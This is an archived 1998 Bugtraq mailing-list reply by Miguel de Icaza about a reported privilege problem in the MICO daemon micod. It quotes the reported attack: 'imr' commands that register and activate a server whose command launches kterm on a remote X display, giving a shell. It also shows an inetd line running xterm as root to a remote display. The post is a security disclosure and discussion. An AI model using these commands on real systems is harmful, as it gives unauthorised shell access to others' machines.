Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: MICO: security problem: Privileges of micod for everybody!
From: miguel () NUCLECU UNAM MX (Miguel de Icaza)
Date: Sun, 10 May 1998 17:10:30 -0500


(micod ist started on inet:winkelklinke.local:8888)
(hacking from enfin.local, which has X on display :0)

imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
"kterm -display enfin.local:0 & echo" IDL:Anything:1.0
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play

I would not consider this an explot, I would consider this just not
understanding what you are doing.

This `exploit' is equivalent to putting in your /etc/inetd.conf:

service stream tcp nowait root /usr/X11R6/bin/xterm -display somehost:0

Users of MICO need to implement their own authentication systems
(which we do, for those who care about the panel).

Best wishes,
Miguel.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]